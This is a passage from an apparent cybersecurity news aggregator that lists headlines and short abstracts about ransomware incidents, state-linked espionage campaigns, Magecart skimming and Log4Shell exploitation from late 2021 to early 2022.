Emil Frey was hit with a ransomware attack last month, according to a statement from the company. It showed up on the list of victims for the Hive ransomware on February 1.ZDNet
February 14, 2022
San Francisco 49ers Confirm Ransomware Attack on its Corporate IT Network Full Text
Abstract
The San Francisco 49ers NFL team has fallen victim to a ransomware attack that encrypted files on its corporate IT network, a spokesperson for the team has told The Record.The Record
February 13, 2022
NFL’s San Francisco 49ers hit by Blackbyte ransomware attack Full Text
Abstract
The NFL's San Francisco 49ers team is recovering from a cyberattack by the BlackByte ransomware gang who claims to have stolen data from the American football organization.BleepingComputer
February 13, 2022
San Francisco 49ers NFL team discloses BlackByte ransomware attack Full Text
Abstract
A ransomware attack hit the corporate IT network of the San Francisco 49ers NFL team, The Record reported. The San Francisco 49ers NFL team has fallen victim to a ransomware attack; the news was reported by The Record. The team disclosed the attack...Security Affairs
February 11, 2022
Hackers Planted Fake Digital Evidence on Devices of Indian Activists and Lawyers Full Text
Abstract
A previously unknown hacking group has been linked to targeted attacks against human rights activists, human rights defenders, academics, and lawyers across India in an attempt to plant "incriminating digital evidence." Cybersecurity firm SentinelOne attributed the intrusions to a group it tracks as "ModifiedElephant," an elusive threat actor that's been operational since at least 2012, whose activity aligns sharply with Indian state interests. "ModifiedElephant operates through the use of commercially available remote access trojans (RATs) and has potential ties to the commercial surveillance industry," the researchers said. "The threat actor uses spear-phishing with malicious documents to deliver malware, such as NetWire, DarkComet, and simple keyloggers." The primary goal of ModifiedElephant is to facilitate long-term surveillance of targeted individuals, ultimately leading to the delivery of "evidence" on the victimThe Hacker News
February 11, 2022
Series of Magecart Attacks Against Outdated Magento Sites Full Text
Abstract
Another massive wave of Magecart attacks was detected by Sansec last week. This attack, once again, highlights the vulnerability of e-commerce sites running outdated software.Cyware Alerts - Hacker News
February 11, 2022
The Pirate Bay Clones Target Millions of Users Every Month Full Text
Abstract
CyberNews discovered five malicious domains parading around as The Pirate Bay. These domains served malicious ads to more than seven million users every month by using free content to lure targets.Cyware Alerts - Hacker News
February 10, 2022
Attackers Increasingly Adopting Regsvr32 Utility Execution Via Office Documents Full Text
Abstract
The Uptycs threat research team has been observing an increase in utilization of regsvr32.exe heavily via various types of Microsoft Office documents. The full report that includes Indicators of Compromise (IOCs) is available here: https://www.uptycs.com/blog/attackers-increasingly-adopting-regsvr32-utility-execution-via-office-documents During...Security Affairs
February 10, 2022
Sharp SIM-Swapping Spike Causes $68M in Losses Full Text
Abstract
The attacks, which lead to 2FA defeat and account takeover, have accelerated by several hundred percent in one year, leading to thousands of drained bank accounts.Threatpost
February 09, 2022
Wave of MageCart attacks target hundreds of outdated Magento sites Full Text
Abstract
Analysts have found the source of a mass breach of over 500 e-commerce stores running the Magento 1 platform and involves a single domain loading a credit card skimmer on all of them.BleepingComputer
February 09, 2022
Iranian Hackers Using New Marlin Backdoor in ‘Out to Sea’ Espionage Campaign Full Text
Abstract
An advanced persistent threat (APT) group with ties to Iran has refreshed its malware toolset to include a new backdoor dubbed Marlin as part of a long-running espionage campaign that started in April 2018. Slovak cybersecurity company ESET attributed the attacks — codenamed "Out to Sea" — to a threat actor called OilRig (aka APT34), while also conclusively connecting its activities to a second Iranian group tracked under the name Lyceum (Hexane aka SiameseKitten). "Victims of the campaign include diplomatic organizations, technology companies, and medical organizations in Israel, Tunisia, and the United Arab Emirates," ESET noted in its T3 2021 Threat Report shared with The Hacker News. Active since at least 2014, the hacking group is known to strike Middle Eastern governments and a variety of business verticals, including chemical, energy, financial, and telecommunications. In April 2021, the actor targeted a Lebanese entity with an implant calledThe Hacker News
February 9, 2022
The Pirate Bay clones target millions of users with malware and malicious ads Full Text
Abstract
CyberNews researchers discovered five clones of The Pirate Bay serving malicious ads to more than seven million users each month. Original Post @ https://cybernews.com/security/the-pirate-bay-clones-target-millions-of-users-with-malware-and-malicious-ads/ CyberNews...Security Affairs
February 09, 2022
Molerats hackers deploy new malware in highly evasive campaign Full Text
Abstract
The Palestinian-aligned APT group tracked as TA402 (aka Molerats) was spotted using a new implant named 'NimbleMamba' in a cyber-espionage campaign that leverages geofencing and URL redirects to legitimate websites.BleepingComputer
February 8, 2022
China Suspected of News Corp Cyberespionage Attack Full Text
Abstract
Attackers infiltrated the media giant’s network using BEC, while Microsoft moved to stop such attacks by blocking VBA macros in 5 Windows apps. Included: more ways to help stop BEC.Threatpost
February 08, 2022
Palestinian Hackers Use New NimbleMamba Implant in Recent Attacks Full Text
Abstract
An advanced persistent threat (APT) hacking group operating with motives that likely align with Palestine has embarked on a new campaign that leverages a previously undocumented implant called NimbleMamba. The intrusions leveraged a sophisticated attack chain targeting Middle Eastern governments, foreign policy think tanks, and a state-affiliated airline, enterprise security firm Proofpoint said in a report, attributing the covert operation to a threat actor tracked as Molerats (aka TA402). Notorious for continuously updating their malware implants and their delivery methods, the APT group was most recently linked to an espionage offensive aimed at human rights activists and journalists in Palestine and Turkey, while a previous attack exposed in June 2021 resulted in the deployment of a backdoor called LastConn. But the lull in the activities has been offset by the operators actively working to retool their arsenal, resulting in the development of NimbleMamba, which is desiThe Hacker News
February 8, 2022
Gamaredon Responsible for Attacks on Ukraine Since 2021 Full Text
Abstract
Microsoft shared new information on Gamaredon, also known as ACTINIUM, which has been responsible for a plethora of spear-phishing attacks against Ukrainian organizations since October 2021. One of the techniques used by Gamaredon was sending spear-phishing emails containing malicious macro as atta ... Read MoreCyware Alerts - Hacker News
February 8, 2022
Vodafone Portugal hit by a massive cyberattack Full Text
Abstract
A cyberattack hit Vodafone Portugal, causing severe outages of its communication and television services in the country. Vodafone Portugal suffered a major cyberattack that caused service outages in the country, media reported the temporary disruption...Security Affairs
February 07, 2022
Roaming Mantis Android malware campaign sets sights on Europe Full Text
Abstract
The Roaming Mantis SMS phishing campaign has finally reached Europe, as researchers detect campaigns targeting Android and iPhone users in Germany and France with malicious apps and phishing pages.BleepingComputer
February 7, 2022
Gamaredon Targets Ukraine with New Payloads Full Text
Abstract
Symantec experts disclosed that the Russia-linked Gamaredon deployed eight custom malware samples against Ukrainian targets in the attacks that began last year in July. These files launch a VBS file that eventually drops a well-documented backdoor, known as Pteranodon. Organizations are suggested t ... Read MoreCyware Alerts - Hacker News
February 4, 2022
Ransomware attack hit Swissport International causing delays in flights Full Text
Abstract
Swissport International was hit by a ransomware attack that had a severe impact on its operations causing flights to suffer delays. The company said via Twitter that the attack has been largely contained.Security Affairs
February 4, 2022
Over 500,000 people were impacted by a ransomware attack that hit Morley Full Text
Abstract
Business services firm Morley was hit by a ransomware attack that may have exposed data of more than 500,000 individuals. Business services company Morley was the victim of a ransomware attack that may have resulted in a data breach impacting more than 500,000...Security Affairs
February 04, 2022
News Corp hit by cyberattack with suspected link to China Full Text
Abstract
The media company News Corp. said Friday it was the victim of a cyberattack likely to benefit the Chinese government, and that the intrusion targeted its businesses including the New York Post, Dow Jones and others.The Hill
February 4, 2022
Ransomware attack hit Swissport International causing delays in flights Full Text
Abstract
Aviation services company Swissport International was hit by a ransomware attack that impacted its operations. Swissport International Ltd. is an aviation services company providing airport ground, lounge hospitality and cargo handling services owned...Security Affairs
February 4, 2022
How attackers got access to the systems of the National Games of China Full Text
Abstract
In early September 2021, Avast threat researcher David Álvarez found a malware sample with a suspicious file extension and a report submitted by the National Games IT team to VirusTotal on an attack against a server associated with the Games.Avast
February 4, 2022
A nation-state actor hacked media and publishing giant News Corp Full Text
Abstract
American media and publishing giant News Corp revealed it was the victim of a cyber attack from an advanced persistent threat actor. American media and publishing giant News Corp revealed it was the victim of a cyber attack from an advanced persistent threat...Security Affairs
February 4, 2022
Airport Services Firm Faces Cyberattack Resulting in Flight Delays Due to Impact on IT Infrastructure Full Text
Abstract
Swiss airport management service Swissport reported a ransomware attack affecting its IT systems on Friday. The company said its IT infrastructure was targeted by the ransomware attack.ZDNet
February 4, 2022
Millions of Android Users Targeted by Dark Herring Full Text
Abstract
Experts exposed Dark Herring subscription fraud campaign that infected 105 million devices worldwide via 500 malicious apps to steal hundreds of millions of dollars from unsuspecting users. The names of some malicious apps are Smashex, Upgradem, Stream HD, Vidly Vibe, and Cast It. This indicat ... Read MoreCyware Alerts - Hacker News
February 04, 2022
HHS: Conti ransomware encrypted 80% of Ireland’s HSE IT systems Full Text
Abstract
A threat brief published by the US Department of Health and Human Services (HHS) on Thursday paints a grim picture of how Ireland's health service, the HSE, was overwhelmed and had 80% of its systems encrypted during last year's Conti ransomware attack.BleepingComputer
February 04, 2022
News Corp discloses hack from “persistent” nation state cyber attacks Full Text
Abstract
American media and publishing giant News Corp has disclosed today that it was the target of a "persistent" cyberattack. The attack discovered sometime this January, reportedly allowed threat actors to access emails and documents of some News Corp employees, including journalists.BleepingComputer
February 3, 2022
Kronos Still Dragging Itself Back From Ransomware Hell Full Text
Abstract
And customers including Tesla, PepsiCo and NYC transit workers are filing lawsuits over the “real pain in the rear end” of manual inputting, inaccurate wages & more.Threatpost
February 03, 2022
New SEO Poisoning Campaign Distributing Trojanized Versions of Popular Software Full Text
Abstract
An ongoing search engine optimization (SEO) poisoning attack campaign has been observed abusing trust in legitimate software utilities to trick users into downloading BATLOADER malware on compromised machines. "The threat actor used 'free productivity apps installation' or 'free software development tools installation' themes as SEO keywords to lure victims to a compromised website and to download a malicious installer," researchers from Mandiant said in a report published this week. In SEO poisoning attacks, adversaries artificially increase the search engine ranking of websites (genuine or otherwise) hosting their malware to make them show up on top of search results so that users searching for specific apps like TeamViewer, Visual Studio, and Zoom are infected with malware. The installer, while packing the legitimate software, is also bundled with the BATLOADER payload that's executed during the installation process. The malware then acts as aThe Hacker News
February 3, 2022
Tennessee Community College Suffers Ransomware Attack Full Text
Abstract
The college’s main database and credit card payment systems were not involved, and no data from them was accessed by unauthorized users, said the board, which oversees the state’s community colleges.Security Week
February 3, 2022
Oil terminals in Europe’s biggest ports hit by a cyberattack Full Text
Abstract
A cyber attack hit the oil terminals of some of the biggest European ports impacting their operations. Some of the major oil terminals in Western Europe's biggest ports have been targeted with a cyberattack. Threat actors have hit multiple oil facilities...Security Affairs
February 03, 2022
New Wave of Cyber Attacks Target Palestine with Political Bait and Malware Full Text
Abstract
Cybersecurity researchers have turned the spotlight on a new wave of offensive cyberattacks targeting Palestinian activists and entities starting around October 2021 using politically-themed phishing emails and decoy documents. The intrusions are part of what Cisco Talos calls a longstanding espionage and information theft campaign undertaken by the Arid Viper hacking group using a Delphi-based implant called Micropsia dating all the way back to June 2017. The threat actor's activities, also tracked under the monikers Desert Falcon and APT-C-23, were first documented in February 2015 by Kaspersky and subsequently in 2017, when Qihoo 360 disclosed details of cross-platform backdoors developed by the group to strike Palestinian institutions. The Russian cybersecurity company branded Arid Viper the "first exclusively Arabic APT group." Then in April 2021, Meta (formerly Facebook), which pointed out the group's affiliations to the cyber arm of HamasThe Hacker News
February 3, 2022
Ransomware Often Hits Industrial Systems, With Significant Impact: Survey Full Text
Abstract
In a new survey, 80% of respondents admitted that their organization had experienced a ransomware attack within the past year, and nearly half said the incident had impacted their ICS/OT environment.Security Week
February 2, 2022
KP Snacks Left with Crumbs After Ransomware Attack Full Text
Abstract
The Conti gang strikes again, disrupting the nom-merchant’s supply chain and threatening supermarket shelves that could stay empty for weeks.Threatpost
February 2, 2022
DeadBolt Hits QNAP Hard, 3600 Devices Impacted Full Text
Abstract
A new DeadBolt ransomware group encrypted more than 3,600 network-attached storage (NAS) devices worldwide by exploiting a zero-day with the most affected countries being the U.S., France, Taiwan, Italy, and the U.K. QNAP has warned customers to protect their devices by updating the QTS software ve ... Read MoreCyware Alerts - Hacker News
February 02, 2022
Business services provider Morley discloses ransomware incident Full Text
Abstract
Morley Companies Inc. disclosed a data breach after suffering a ransomware attack on August 1st, 2021, allowing threat actors to steal data before encrypting files.BleepingComputer
February 2, 2022
Arid Viper Hackers Strike Palestinian Targets with Political Lures and Trojans Full Text
Abstract
In the past, the group has been responsible for spear phishing attacks against Palestinian law enforcement, the military, educational establishments, and the Israel Security Agency (ISA).ZDNet
February 2, 2022
Massive Social Engineering Campaigns Impacted Banks in Europe and South America Full Text
Abstract
The campaigns, which aim to steal users' banking secrets and payment cards, are carried out using social engineering schemes, namely smishing and spear-phishing through fake emails.Security Affairs
February 1, 2022
Massive social engineering waves have impacted banks in several countries Full Text
Abstract
A massive social engineering campaign targeting banks has been delivered in the last two years in several countries. A massive social engineering campaign has been delivered in the last two years in several countries, including Portugal, Spain, Brazil,...Security Affairs
February 1, 2022
A cyber attack severely impacted the operations of German petrol distributor Oiltanking GmbH Full Text
Abstract
German petrol distributor Oiltanking GmbH was the victim of a cyberattack that had a severe impact on its operations. A cyber attack hit Oiltanking GmbH, a German petrol distributor that supplies Shell gas stations in the country, severely impacting...Security Affairs
February 01, 2022
MuddyWater hacking group targets Turkey in new campaign Full Text
Abstract
The Iranian-backed MuddyWater hacking group is conducting a new malicious campaign targeting private Turkish organizations and governmental institutions.BleepingComputer
January 31, 2022
Hundreds of thousands of routers exposed to Eternal Silence campaign via UPnP Full Text
Abstract
A hacking campaign, tracked as Eternal Silence, is abusing UPnP to compromise routers and use them to carry out malicious activities. Researchers from Akamai have spotted a malicious campaign, tracked as 'Eternal Silence,' that is abusing Universal...Security Affairs
January 31, 2022
Russian ‘Gamaredon’ hackers use 8 new malware payloads in attacks Full Text
Abstract
The Russia-linked hackers known as 'Gamaredon' (aka Armageddon or Shuckworm) were spotted deploying eight custom binaries in cyber-espionage operations against Ukrainian entities.BleepingComputer
January 30, 2022
Hybrid cloud campaign OiVaVoii targets company executives Full Text
Abstract
A new hacking campaign, tracked as ‘OiVaVoii’, is targeting company executives with malicious OAuth apps. Researchers from Proofpoint have uncovered a new campaign named ‘OiVaVoii’ that is targeting company executives, former board members,...Security Affairs
January 28, 2022
Hackers Using Device Registration Trick to Attack Enterprises with Lateral Phishing Full Text
Abstract
Microsoft has disclosed details of a large-scale, multi-phase phishing campaign that uses stolen credentials to register devices on a victim's network to further propagate spam emails and widen the infection pool. The tech giant said the attacks manifested through accounts that were not secured using multi-factor authentication (MFA), thereby making it possible for the adversary to take advantage of the target's bring-your-own-device (BYOD) policy and introduce their own rogue devices using the pilfered credentials. The attacks took place in two stages. "The first campaign phase involved stealing credentials in target organizations located predominantly in Australia, Singapore, Indonesia, and Thailand," Microsoft 365 Defender Threat Intelligence Team said in a technical report published this week. "Stolen credentials were then leveraged in the second phase, in which attackers used compromised accounts to expand their foothold within the organization via laThe Hacker News
January 28, 2022
Delta Electronics, a tech giants’ contractor, hit by Conti ransomware Full Text
Abstract
Delta Electronics, a Taiwanese contractor for multiple tech giants such as Apple, Dell, HP and Tesla, was hit by Conti ransomware. Taiwanese electronics manufacturing company Delta Electronics was hit by a Conti ransomware attack that took place this week....Security Affairs
January 28, 2022
QNAP force-installs update after DeadBolt ransomware hits 3,600 devices Full Text
Abstract
QNAP force-updated customer's Network Attached Storage (NAS) devices with firmware containing the latest security updates to protect against the DeadBolt ransomware, which has already encrypted over 3,600 devices.BleepingComputer
January 27, 2022
Puerto Rico was hit by a major cyberattack Full Text
Abstract
Puerto Rico’s Senate announced that it was hit by a cyberattack that shut down its internet provider, phone system and official online page. The Senate of Puerto Rico announced this week that it was hit by a major cyberattack that disabled its internet...Security Affairs
January 27, 2022
Taiwanese Apple and Tesla contractor hit by Conti ransomware Full Text
Abstract
Delta Electronics, a Taiwanese electronics company and a provider for Apple, Tesla, HP, and Dell, disclosed that it was the victim of a cyberattack discovered on Friday morning.BleepingComputer
January 27, 2022
105 million Android users targeted by subscription fraud campaign Full Text
Abstract
A premium services subscription scam for Android has been operating for close to two years. Called 'Dark Herring', the operation used 470 Google Play Store apps and affected over 100 million users worldwide, potentially causing hundreds of millions of USD in total losses.BleepingComputer
January 26, 2022
Initial Access Broker Involved in Log4Shell Attacks Against VMware Horizon Servers Full Text
Abstract
An initial access broker group tracked as Prophet Spider has been linked to a set of malicious activities that exploits the Log4Shell vulnerability in unpatched VMware Horizon Servers. According to new research published by BlackBerry Research & Intelligence and Incident Response (IR) teams today, the cybercrime actor has been opportunistically weaponizing the shortcoming to download a second-stage payload onto the victimized systems. The payloads observed include cryptocurrency miners, Cobalt Strike Beacons, and web shells, corroborating a previous advisory from the U.K. National Health Service (NHS) that sounded the alarm on active exploitation of the vulnerabilities in VMware Horizon servers to drop malicious web shells and establish persistence on affected networks for follow-on attacks. Log4Shell is a moniker used to refer to an exploit affecting the popular Apache Log4j library that results in remote code execution by logging a specially crafted string. Since publicThe Hacker News
January 25, 2022
Canada’s foreign ministry targeted in cyberattack Full Text
Abstract
The Canadian foreign ministry has been impacted by a "cyber incident" that has interrupted some of its "internet-based services," the Canadian government said Monday, according to CNN.The Hill
January 25, 2022
Belarus hackers say they’ve targeted railway to impede Russian troop movements Full Text
Abstract
A group of Belarusian hackers on Monday said they have targeted a national railway company in an effort to hinder the movement of Russian troops, as tensions rise between Moscow and Kyiv amid reports of a Russian incursion into Ukraine.The Hill
January 25, 2022
Hackers Infect macOS with New DazzleSpy Backdoor in Watering-Hole Attacks Full Text
Abstract
A previously undocumented cyber-espionage malware aimed at Apple's macOS operating system leveraged a Safari web browser exploit as part of a watering hole attack targeting politically active, pro-democracy individuals in Hong Kong. Slovak cybersecurity firm ESET attributed the intrusion to an actor with "strong technical capabilities," calling out the campaign's overlaps to that of a similar digital offensive disclosed by Google Threat Analysis Group (TAG) in November 2021. The attack chain involved compromising a legitimate website belonging to D100 Radio, a pro-democracy internet radio station in Hong Kong, to inject malicious inline frames (aka iframes) between September 30 and November 4, 2021. In the next phase, the tampered code acted as a conduit to load a Mach-O file by leveraging a remote code execution bug in WebKit that was fixed by Apple in February 2021 (CVE-2021-1789). "The exploit used to gain code execution in the browser is quiteThe Hacker News
January 25, 2022
Segway Hit by Magecart Attack Hiding in a Favicon Full Text
Abstract
Visitors who shopped on the company’s eCommerce website in January will likely find their payment-card data heisted, researchers warned.Threatpost
January 25, 2022
Sophisticated attackers used DazzleSpy macOS backdoor in watering hole attacks Full Text
Abstract
Experts found an undocumented macOS backdoor, dubbed DazzleSpy, that was employed in watering hole attacks aimed at politically active individuals in Hong Kong. Researchers from ESET have spotted an undocumented macOS backdoor, dubbed DazzleSpy,...Security Affairs
January 25, 2022
Attackers are actively targeting critical RCE bug in SonicWall Secure Mobile Access Full Text
Abstract
Threat actors are actively exploiting a critical flaw (CVE-2021-20038) in SonicWall's Secure Mobile Access (SMA) gateways addressed in December. Threat actors are actively exploiting a critical flaw, tracked as CVE-2021-20038, in SonicWall's Secure...Security Affairs
January 24, 2022
Attackers now actively targeting critical SonicWall RCE bug Full Text
Abstract
A critical severity vulnerability impacting SonicWall's Secure Mobile Access (SMA) gateways addressed last month is now targeted in ongoing exploitation attempts.BleepingComputer
January 24, 2022
Tens of AccessPress WordPress themes compromised as part of a supply chain attack Full Text
Abstract
Threat actors planted a backdoor into multiple WordPress themes and plugins after compromising the website of their developer. In a classic supply chain attack, threat actors planted a backdoor in dozens of WordPress plugins and themes hosted on a developer's...Security Affairs
January 24, 2022
Earth Karkaddan Delivers CapraRAT, CrimsonRAT, and ObliqueRAT via Spear-Phishing Campaigns Full Text
Abstract
Typically, the Earth Karkaddan hacker group's arrival methods include the use of spear-phishing emails and a USB worm that would then drop and execute a remote access trojan (RAT).Trend Micro
January 24, 2022
China accused of hijacking Australia Prime Minister Scott Morrison’s WeChat account Full Text
Abstract
An Australian member of parliament has accused the Chinese government of foreign interference after Prime Minister Scott Morrison's account on WeChat was hijacked recently.ZDNet
January 22, 2022
Researchers find similarities between NotPetya, attacks on Ukrainian government websites Full Text
Abstract
The malware that wiped dozens of government computer systems in Ukraine starting on Jan. 13 shares some strategic similarities to the NotPetya wiper that was used to attack Ukraine in 2017.Cyberscoop
January 22, 2022
Experts Find Strategic Similarities b/w NotPetya and WhisperGate Attacks on Ukraine Full Text
Abstract
Latest analysis into the wiper malware that targeted dozens of Ukrainian agencies earlier this month has revealed "strategic similarities" to NotPetya malware that was unleashed against the country's infrastructure and elsewhere in 2017. The malware, dubbed WhisperGate, was discovered by Microsoft last week, which said it observed the destructive cyber campaign targeting government, non-profit, and information technology entities in the nation, attributing the intrusions to an emerging threat cluster codenamed "DEV-0586." "While WhisperGate has some strategic similarities to the notorious NotPetya wiper that attacked Ukrainian entities in 2017, including masquerading as ransomware and targeting and destroying the master boot record (MBR) instead of encrypting it, it notably has more components designed to inflict additional damage," Cisco Talos said in a report detailing its response efforts. Stating that stolen credentials were likely used iThe Hacker News
January 22, 2022
Disruptive Attacks in Ukraine Likely Linked to Escalating Tensions Full Text
Abstract
The threat actors attempted to misdirect attribution using inauthentic metadata and used publicly available crimeware services and code to minimize the amount of custom code involved in the attack.Secure Works
January 21, 2022
Contextualizing Last Week’s Malicious Cyber Activities Against Ukrainian Government Websites and Systems Full Text
Abstract
The events reflect the complexity of how cyber operations can function diversely across and even within specific conflicts.Lawfare
January 20, 2022
New Log4j attacks target SolarWinds, ZyXEL devices Full Text
Abstract
Cybercriminals looking to capitalize on the Log4Shell vulnerability are attacking devices from SolarWinds and ZyXEL that are known to have used the Log4j library inside their software.The Record
January 20, 2022
Red Cross hit by a sophisticated cyberattack Full Text
Abstract
A cyberattack on a Red Cross contractor resulted in the theft of personal data for more than 515,000 highly vulnerable people. A cyberattack on a Red Cross contractor resulted in the theft of personal data for more than 515,000 highly vulnerable people...Security Affairs
January 18, 2022
Ukraine: Recent Cyber Attacks Part of Wider Plot to Sabotage Critical Infrastructure Full Text
Abstract
The coordinated cyberattacks targeting Ukrainian government websites and the deployment of a data-wiper malware called WhisperGate on select government systems are part of a broader wave of malicious activities aimed at sabotaging critical infrastructure in the country. The Secret Service of Ukraine on Monday confirmed that the two incidents are related, adding the breaches also exploited the recently disclosed Log4j vulnerabilities to gain access to some of the compromised systems. "The attack used vulnerabilities in the site's content management systems (October CMS) and Log4j, as well as compromised accounts of employees of the development company," the SSU said, corroborating prior disclosure from the Ukraine CERT team. The disclosure comes days after Microsoft warned of a malware operation aimed at government, non-profit, and information technology entities in Ukraine, attributing the attacks to a threat cluster codenamed "DEV-0586." "The Hacker News
January 18, 2022
Destructive MBR Wiper Targets Ukrainian Organizations Full Text
Abstract
The attacks started on January 13 - around the same time when more than 70 government websites were defaced by gangs reportedly linked to Russian secret services.Cyware Alerts - Hacker News
January 17, 2022
UK Umbrella Company Parasol Group Confirms Disruptive Cyberattack Full Text
Abstract
As reported on Friday, the umbrella company's MyParasol portal, where timesheets are submitted, was not accessible due to an outage starting on January 12, impacting the processing of payroll.The Register
January 17, 2022
Experts warn of attacks using a new Linux variant of SFile ransomware Full Text
Abstract
The operators of the SFile ransomware (aka Escal) have developed a Linux version of their malware to expand their operations. SFile ransomware (aka Escal) has been active since 2020; until now it was observed targeting only Windows systems. Some variants...Security Affairs
January 17, 2022
Cyber espionage campaign targets renewable energy companies Full Text
Abstract
A large-scale cyber-espionage campaign targeting primarily renewable energy and industrial technology organizations has been discovered to be active since at least 2019, targeting over fifteen entities worldwide.BleepingComputer
January 16, 2022
Microsoft: Fake ransomware targets Ukraine in data-wiping attacks Full Text
Abstract
Microsoft is warning of destructive data-wiping malware disguised as ransomware being used in attacks against multiple organizations in Ukraine.BleepingComputer
January 16, 2022
Microsoft spotted a destructive malware campaign targeting Ukraine Full Text
Abstract
Microsoft spotted a new destructive malware operation targeting government, non-profit, and IT entities in Ukraine. Microsoft spotted a destructive attack that targeted government, non-profit, and IT entities in Ukraine with a wiper disguised as ransomware....Security Affairs
January 16, 2022
A new wave of Qlocker ransomware attacks targets QNAP NAS devices Full Text
Abstract
QNAP NAS devices are under attack; experts warn of a new Qlocker ransomware campaign that hit devices worldwide. A new wave of Qlocker ransomware is targeting QNAP NAS devices worldwide. The new campaign started on January 6 and drops ransom notes...Security Affairs
January 14, 2022
Ukrainian websites hit by cyberattack amid tensions with Russia Full Text
Abstract
Several Ukrainian government websites were hit by what officials called a "massive cyberattack" on Friday as hackers took control and posted messages warning Ukraine to "be afraid and expect worse."The Hill
January 14, 2022
Defense contractor Hensoldt confirms Lorenz ransomware attack Full Text
Abstract
Hensoldt, a multinational defense contractor headquartered in Germany, has confirmed that some of its UK subsidiary's systems were compromised in a ransomware attack.BleepingComputer
January 14, 2022
Multiple Ukrainian government websites hacked and defaced Full Text
Abstract
At least 15 websites belonging to various Ukrainian public institutions were compromised, defaced, and subsequently taken offline.BleepingComputer
January 13, 2022
New GootLoader Campaign Targets Accounting, Law Firms Full Text
Abstract
GootLoader hijacks WordPress sites to lure professionals to download malicious sample contract templates.Threatpost
January 13, 2022
Threat actors abuse public cloud services to spread multiple RATs Full Text
Abstract
Threat actors are actively abusing cloud services from Amazon and Microsoft to deliver RATs such as Nanocore, Netwire, and AsyncRAT. Threat actors are actively exploiting public cloud services from Amazon and Microsoft to spread RATs such as Nanocore, Netwire,...Security Affairs
January 11, 2022
FIN7 Mails Malicious USB Sticks to Drop Ransomware Full Text
Abstract
The FBI warned that attackers are impersonating Health & Human Services and/or Amazon to mail BadUSB-poisoned USB devices to targets in transportation, insurance & defense.Threatpost
January 11, 2022
Cosmetics company Clarins hit by data security incident, ‘may involve’ Singapore customers’ personal information Full Text
Abstract
The data accessed may have included customers’ personal information such as name, address, email, phone number, and Clarins loyalty program status, the cosmetics company added.Channel News Asia
January 10, 2022
Zloader Campaign Abuses Microsoft’s Security Checks Full Text
Abstract
The Malsmoke hacking group attacked over 2,100 victims worldwide in a new Zloader campaign by abusing a bug in Microsoft’s e-signature verification tool. Though it couldn't be confirmed, experts believe the group uses spear-phishing emails or pirated software resources to infect victims. Such ... Read MoreCyware Alerts - Hacker News
January 10, 2022
New ZLoader malware campaign hit more than 2000 victims across 111 countries Full Text
Abstract
A malware campaign spreads ZLoader malware by exploiting a Windows vulnerability that was fixed in 2013, a fix Microsoft revised in 2014. Experts from Check Point Research uncovered a new ZLoader malware campaign in early November 2021. The malware...Security Affairs
January 06, 2022
North Korean Hackers Start New Year with Attacks on Russian Foreign Ministry Full Text
Abstract
A North Korean cyberespionage group named Konni has been linked to a series of targeted attacks aimed at the Russian Federation's Ministry of Foreign Affairs (MID) with New Year lures to compromise Windows systems with malware. "This activity cluster demonstrates the patient and persistent nature of advanced actors in waging multi-phased campaigns against perceived high-value networks," researchers from Lumen Technologies' Black Lotus Labs said in an analysis shared with The Hacker News. The Konni group's tactics, techniques, and procedures (TTPs) are known to overlap with threat actors belonging to the broader Kimsuky umbrella, which is also tracked by the cybersecurity community under the monikers Velvet Chollima, ITG16, Black Banshee, and Thallium. The most recent attacks involved the actor gaining access to the target networks through stolen credentials, exploiting the foothold to load malware for intelligence gathering purposes, with early signs of tThe Hacker News
January 05, 2022
Microsoft code-sign check bypassed to drop Zloader malware Full Text
Abstract
A new Zloader campaign exploits Microsoft's e-signature code verification to steal user credentials from over two thousand victims in 111 countries.BleepingComputer
January 04, 2022
Microsoft Warns of Continued Attacks Exploiting Apache Log4j Vulnerabilities Full Text
Abstract
Microsoft is warning of continuing attempts by nation-state adversaries and commodity attackers to take advantage of security vulnerabilities uncovered in the Log4j open-source logging framework to deploy malware on vulnerable systems. "Exploitation attempts and testing have remained high during the last weeks of December," Microsoft Threat Intelligence Center (MSTIC) said in revised guidance published earlier this week. "We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks." Publicly disclosed by the Apache Software Foundation on December 10, 2021, the remote code execution (RCE) vulnerability in Apache Log4j 2, aka Log4Shell, has emerged as a new attack vector for widespread exploitation by a variety of threat actors. In the subsequent weeks, four more weaknesses in the utility have come to light — CVE-2021-45046, CVE-2021-45105,The Hacker News
January 04, 2022
Hillicon Valley — Twitter’s Greene ban boosts GOP attacks Full Text
Abstract
Today is Tuesday. Welcome to Hillicon Valley, detailing all you need to know about tech and cyber news from Capitol Hill to Silicon Valley. Subscribe here: thehill.com/newsletter-signup.The Hill
January 4, 2022
Microsoft Sees Rampant Log4j Exploit Attempts, Testing Full Text
Abstract
Microsoft says it’s only going to get worse: It’s seen state-sponsored and cyber-criminal attackers probing systems for the Log4Shell flaw through the end of December.Threatpost
January 3, 2022
MSBuild Abused for Execution of Cobalt Strike Beacon Full Text
Abstract
Researchers uncovered two malicious campaigns that abuse MSBuild to drop Cobalt Strike on targeted machines. The attackers first gain access to the target environment with an RDP account. As per experts, the Windows Defender Application Control (WDAC) policy can prevent these kinds of attacks.Cyware Alerts - Hacker News
January 3, 2022
Israeli Media Outlets hacked on the anniversary of Soleimani killing Full Text
Abstract
Threat actors hacked the website of Jerusalem Post and the Twitter account of Maariv outlet on Soleimani killing anniversary. Threat actors have taken over the website of the English-language Jerusalem Post and the Twitter account of Maariv daily...Security Affairs
January 2, 2022
Exclusive: NASA Director Twitter account hacked by Powerful Greek Army Full Text
Abstract
The Twitter account of NASA Director Parimal Kopardekar (@nasapk) was hacked by the Powerful Greek Army group. The Twitter account of the NASA Director and Sr Technologist for Air Transportation System Mr. Parimal Kopardekar (@nasapk) was hacked by the Powerful...Security Affairs
December 29, 2021
Fintech firm hit by Log4j hack refuses to pay $5 million ransom Full Text
Abstract
One of the largest Vietnamese crypto trading platforms, ONUS, recently suffered a cyber attack on its payment system running a vulnerable Log4j version. Soon enough, threat actors approached ONUS to extort $5 million and threatened to publish customer data should ONUS refuse to comply.BleepingComputer
December 28, 2021
Shutterfly hit by a Conti ransomware attack Full Text
Abstract
Shutterfly, an online platform for photography and personalized products, has been affected by a ransomware attack. Shutterfly is an American photography, photography products, and image sharing company that owns multiple brands such as BorrowLenses,...Security Affairs
December 27, 2021
QNAP NAS devices hit in surge of ech0raix ransomware attacks Full Text
Abstract
Users of QNAP network-attached storage (NAS) devices are reporting attacks on their systems with the eCh0raix ransomware, also known as QNAPCrypt.BleepingComputer
December 27, 2021
